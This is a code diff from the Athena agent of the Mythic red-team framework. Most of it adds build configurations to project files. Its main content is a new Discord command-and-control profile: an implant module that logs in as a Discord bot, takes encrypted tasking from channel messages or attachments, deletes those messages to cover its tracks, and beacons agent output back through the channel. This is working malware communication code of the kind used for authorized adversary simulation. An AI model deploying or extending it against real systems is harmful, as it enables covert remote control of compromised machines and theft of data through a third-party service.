MythicAgents · checkymander · Apr 16, 2024 · Mar 26, 2024 · Mar 27, 2024 · Mar 27, 2024
diff --git a/Payload_Type/athena/athena/agent_code/Agent.Crypto.Aes/Agent.Crypto.Aes.csproj b/Payload_Type/athena/athena/agent_code/Agent.Crypto.Aes/Agent.Crypto.Aes.csproj
@@ -4,6 +4,7 @@
     <TargetFramework>net7.0</TargetFramework>
     <ImplicitUsings>enable</ImplicitUsings>
     <Nullable>enable</Nullable>
+    <Configurations>Debug;Release;LocalDebug;LocalDebugHttp;LocalDebugWebsocket;LocalDebugDiscord</Configurations>
   </PropertyGroup>
 	<Target Name="Obfuscate" AfterTargets="AfterCompile" Condition="'$(Obfuscate)' == 'True' And '$(Configuration)' == 'Release'">
 		<Message Text="============Obfuscating Plugin===============" Importance="high" />

diff --git a/Payload_Type/athena/athena/agent_code/Agent.Crypto.None/Agent.Crypto.None.csproj b/Payload_Type/athena/athena/agent_code/Agent.Crypto.None/Agent.Crypto.None.csproj
@@ -3,6 +3,7 @@
     <TargetFramework>net7.0</TargetFramework>
     <ImplicitUsings>enable</ImplicitUsings>
     <Nullable>enable</Nullable>
+    <Configurations>Debug;Release;LocalDebug;LocalDebugHttp;LocalDebugWebsocket;LocalDebugDiscord</Configurations>
   </PropertyGroup>
 	<!-- ToDo: These are unable to be obfuscated at the moment. -->
 	<Target Name="Obfuscate" AfterTargets="AfterCompile" Condition="'$(Obfuscate)' == 'True' And '$(Configuration)' == 'Release'">

diff --git a/Payload_Type/athena/athena/agent_code/Agent.Managers.Linux/Agent.Managers.Linux.csproj b/Payload_Type/athena/athena/agent_code/Agent.Managers.Linux/Agent.Managers.Linux.csproj
@@ -4,6 +4,7 @@
     <TargetFramework>net7.0</TargetFramework>
     <ImplicitUsings>enable</ImplicitUsings>
     <Nullable>enable</Nullable>
+    <Configurations>Debug;Release;LocalDebug;LocalDebugHttp;LocalDebugWebsocket;LocalDebugDiscord</Configurations>
   </PropertyGroup>
 	<Target Name="Obfuscate" AfterTargets="AfterCompile" Condition="'$(Obfuscate)' == 'True' And '$(Configuration)' == 'Release'">
 		<Message Text="============Obfuscating Plugin===============" Importance="high" />

diff --git a/..._Type/athena/athena/agent_code/Agent.Managers.Reflection/Agent.Managers.Reflection.csproj b/..._Type/athena/athena/agent_code/Agent.Managers.Reflection/Agent.Managers.Reflection.csproj
@@ -4,6 +4,7 @@
     <TargetFramework>net7.0</TargetFramework>
     <ImplicitUsings>enable</ImplicitUsings>
     <Nullable>enable</Nullable>
+    <Configurations>Debug;Release;LocalDebug;LocalDebugHttp;LocalDebugWebsocket;LocalDebugDiscord</Configurations>
   </PropertyGroup>
 	<Target Name="Obfuscate" AfterTargets="AfterCompile" Condition="'$(Obfuscate)' == 'True' And '$(Configuration)' == 'Release'">
 		<Message Text="============Obfuscating Plugin===============" Importance="high" />

diff --git a/Payload_Type/athena/athena/agent_code/Agent.Managers.Windows/Agent.Managers.Windows.csproj b/Payload_Type/athena/athena/agent_code/Agent.Managers.Windows/Agent.Managers.Windows.csproj
@@ -5,6 +5,7 @@
     <ImplicitUsings>enable</ImplicitUsings>
     <Nullable>enable</Nullable>
     <AllowUnsafeBlocks>true</AllowUnsafeBlocks>
+    <Configurations>Debug;Release;LocalDebug;LocalDebugHttp;LocalDebugWebsocket;LocalDebugDiscord</Configurations>
   </PropertyGroup>
 	<Target Name="Obfuscate" AfterTargets="AfterCompile" Condition="'$(Obfuscate)' == 'True' And '$(Configuration)' == 'Release'">
 		<Message Text="============Obfuscating Plugin===============" Importance="high" />

diff --git a/Payload_Type/athena/athena/agent_code/Agent.Models/Agent.Models.csproj b/Payload_Type/athena/athena/agent_code/Agent.Models/Agent.Models.csproj
@@ -4,6 +4,7 @@
     <TargetFramework>net7.0</TargetFramework>
     <ImplicitUsings>enable</ImplicitUsings>
     <Nullable>enable</Nullable>
+    <Configurations>Debug;Release;LocalDebug;LocalDebugHttp;LocalDebugWebsocket;LocalDebugDiscord</Configurations>
   </PropertyGroup>
 
 </Project>
diff --git a/Payload_Type/athena/athena/agent_code/Agent.Models/Responses/ProcessTaskResponse.cs b/Payload_Type/athena/athena/agent_code/Agent.Models/Responses/ProcessTaskResponse.cs
@@ -6,7 +6,7 @@
    public class ProcessTaskResponse : TaskResponse
    {
        public List<ServerProcessInfo> processes { get; set; }
        public string ToJson()
        {
            return JsonSerializer.Serialize(this, ProcessResponseJsonContext.Default.ProcessTaskResponse);
        }
@@ -30,5 +30,6 @@
         public long start_time { get; set; }
         public string description { get; set; }
         public string signer { get; set; }
+        public bool update_deleted = true;
     }
 }
diff --git a/...e/athena/athena/agent_code/Agent.Profiles.DebugProfile/Agent.Profiles.DebugProfile.csproj b/...e/athena/athena/agent_code/Agent.Profiles.DebugProfile/Agent.Profiles.DebugProfile.csproj
@@ -4,6 +4,7 @@
     <TargetFramework>net7.0</TargetFramework>
     <ImplicitUsings>enable</ImplicitUsings>
     <Nullable>enable</Nullable>
+    <Configurations>Debug;Release;LocalDebug;LocalDebugHttp;LocalDebugWebsocket;LocalDebugDiscord</Configurations>
   </PropertyGroup>
 
   <ItemGroup>

diff --git a/Payload_Type/athena/athena/agent_code/Agent.Profiles.Discord/Agent.Profiles.Discord.csproj b/Payload_Type/athena/athena/agent_code/Agent.Profiles.Discord/Agent.Profiles.Discord.csproj
@@ -0,0 +1,18 @@
+<Project Sdk="Microsoft.NET.Sdk">
+
+  <PropertyGroup>
+    <TargetFramework>net7.0</TargetFramework>
+    <ImplicitUsings>enable</ImplicitUsings>
+    <Nullable>enable</Nullable>
+    <Configurations>Debug;Release;LocalDebug;LocalDebugHttp;LocalDebugWebsocket;LocalDebugDiscord</Configurations>
+  </PropertyGroup>
+
+  <ItemGroup>
+    <PackageReference Include="Discord.Net.WebSocket" Version="3.14.1" />
+  </ItemGroup>
+
+  <ItemGroup>
+    <ProjectReference Include="..\Agent.Models\Agent.Models.csproj" />
+  </ItemGroup>
+
+</Project>
diff --git a/Payload_Type/athena/athena/agent_code/Agent.Profiles.Discord/Base.txt b/Payload_Type/athena/athena/agent_code/Agent.Profiles.Discord/Base.txt
@@ -0,0 +1,235 @@
+using Agent.Interfaces;
+using Agent.Models;
+using Discord;
+using Discord.WebSocket;
+using Newtonsoft.Json;
+using System.Net.Http;
+
+namespace Agent.Profiles
+{
+    public class DiscordProfile : IProfile
+    {
+        private IAgentConfig agentConfig { get; set; }
+        private ICryptoManager crypt { get; set; }
+        private IMessageManager messageManager { get; set; }
+        private ILogger logger { get; set; }
+        private ManualResetEventSlim checkinAvailable = new ManualResetEventSlim(false);
+        private AutoResetEvent clientReady = new AutoResetEvent(false);
+        private readonly string _token;
+        private readonly ulong _channel_id;
+        private readonly string _uuid = Guid.NewGuid().ToString();
+        private ITextChannel _channel { get; set; }
+        private readonly DiscordSocketClient _client;
+        private readonly HttpClient _httpClient; 
+        private CheckinResponse cir;
+
+        private bool checkedin = false;
+        private bool connected = false;
+        private int currentAttempt = 0;
+        private int maxAttempts = 10;
+
+        public event EventHandler<TaskingReceivedArgs> SetTaskingReceived;
+
+        private CancellationTokenSource cancellationTokenSource { get; set; } = new CancellationTokenSource();
+        public DiscordProfile(IAgentConfig config, ICryptoManager crypto, ILogger logger, IMessageManager messageManager)
+        {
+            crypt = crypto;
+            agentConfig = config;
+            this.messageManager = messageManager;
+            _token = "discord_token";
+            _channel_id = ulong.Parse("bot_channel");
+
+            var gateway_config = new DiscordSocketConfig()
+            {
+                GatewayIntents = GatewayIntents.AllUnprivileged | GatewayIntents.MessageContent
+            };
+            _httpClient = new HttpClient();
+            _client = new DiscordSocketClient(gateway_config);
+            _client.MessageReceived += _client_MessageReceived;
+            _client.Ready += _client_Ready;
+        }
+
+        private async Task _client_Ready()
+        {
+            _channel = (ITextChannel)_client.GetChannel(_channel_id);
+
+            if(_channel is null)
+            {
+                Environment.Exit(0);
+            }
+            clientReady.Set();
+        }
+
+        private async Task _client_MessageReceived(SocketMessage message)
+        {
+            if(message is null)
+            {
+                return;
+            }
+
+
+            MessageWrapper discordMessage;
+            if (message.Attachments.Count > 0 && message.Attachments.FirstOrDefault().Filename.Contains(_uuid))
+            {
+                discordMessage = JsonConvert.DeserializeObject<MessageWrapper>(await GetFileContentsAsync(message.Attachments.FirstOrDefault().Url));
+            }
+            else
+            {
+                discordMessage = JsonConvert.DeserializeObject<MessageWrapper>(message.Content);
+            }
+
+            if (discordMessage is not null &! discordMessage.to_server && discordMessage.client_id == _uuid) //It belongs to us
+            {
+                try
+                {
+                    _ = message.DeleteAsync();
+                }
+                catch { }
+
+                if (!checkedin)
+                {
+                    cir = System.Text.Json.JsonSerializer.Deserialize(this.crypt.Decrypt(discordMessage.message), CheckinResponseJsonContext.Default.CheckinResponse);
+                    checkinAvailable.Set();
+                    return;
+                }
+
+                //If we make it to here, it's a tasking response
+                GetTaskingResponse gtr = System.Text.Json.JsonSerializer.Deserialize(this.crypt.Decrypt(discordMessage.message), GetTaskingResponseJsonContext.Default.GetTaskingResponse);
+                if (gtr == null)
+                {
+                    return;
+                }
+
+                TaskingReceivedArgs tra = new TaskingReceivedArgs(gtr);
+                this.SetTaskingReceived(this, tra);
+            }
+
+        }
+
+        private async Task<bool> Start()
+        {
+            await _client.StartAsync();
+            await _client.LoginAsync(TokenType.Bot, _token);
+            clientReady.WaitOne();
+            return _client.LoginState == LoginState.LoggedIn;
+        }
+
+        public async Task<CheckinResponse> Checkin(Checkin checkin)
+        {
+            //Write our checkin message to the pipe
+
+            await this.Send(System.Text.Json.JsonSerializer.Serialize(checkin, CheckinJsonContext.Default.Checkin));
+
+            //Wait for a checkin response message
+            checkinAvailable.Wait();
+
+            //We got a checkin response, so let's finish the checkin process
+            this.checkedin = true;
+
+            return this.cir;
+        }
+
+        public async Task StartBeacon()
+        {
+            //Main beacon loop handled here
+            this.cancellationTokenSource = new CancellationTokenSource();
+            while (!cancellationTokenSource.Token.IsCancellationRequested)
+            {
+                if (_client.LoginState != LoginState.LoggedIn)
+                {
+                    await this.Start();
+                }
+
+                //Check if we have something to send.
+                if (!this.messageManager.HasResponses())
+                {
+                    continue;
+                }
+
+                try
+                {
+                    await this.Send(await messageManager.GetAgentResponseStringAsync());
+                }
+                catch (Exception e)
+                {
+                    this.currentAttempt++;
+                }
+
+                if (this.currentAttempt >= this.maxAttempts)
+                {
+                    this.cancellationTokenSource.Cancel();
+                }
+            }
+        }
+        internal async Task<string> Send(string json)
+        {
+            if(_client.LoginState != LoginState.LoggedIn)
+            {
+                await this.Start();
+            }
+
+            string msg = this.crypt.Encrypt(json);
+            MessageWrapper discordMessage = new MessageWrapper()
+            {
+                to_server = true,
+                sender_id = _uuid,
+                message = msg,
+                client_id = "",
+            };
+
+            if(_channel is null)
+            {
+                _channel = (ITextChannel)_client.GetChannel(_channel_id);
+            }
+
+            if (json.Length > 1950)
+            {
+                using (MemoryStream stream = new MemoryStream(System.Text.Encoding.ASCII.GetBytes(System.Text.Json.JsonSerializer.Serialize(discordMessage))))
+                {
+                    try
+                    {
+                        await _channel.SendFileAsync(stream, discordMessage.client_id + ".server");
+                    }
+                    catch { }
+                }
+            }
+            else
+            {
+                try
+                {
+                    await _channel.SendMessageAsync(System.Text.Json.JsonSerializer.Serialize(discordMessage));
+                }
+                catch { }
+            }
+
+            return String.Empty;
+        }
+
+        public bool StopBeacon()
+        {
+            this.cancellationTokenSource.Cancel();
+            return true;
+        }
+        private async Task<string> GetFileContentsAsync(string url)
+        {
+            string message = String.Empty;
+            try
+            {
+                using (HttpResponseMessage response = await _httpClient.GetAsync(url))
+                {
+                    using (HttpContent content = response.Content)
+                    {
+                        message = await content.ReadAsStringAsync();
+                    }
+                }
+            }
+            catch { }
+            return await Unescape(message) ?? "";
+        }
+        private async Task<string> Unescape(string message)
+        {
+            return message.TrimStart('"').TrimEnd('"').Replace("\\\"", "\"");
+
+        }
+    }
+}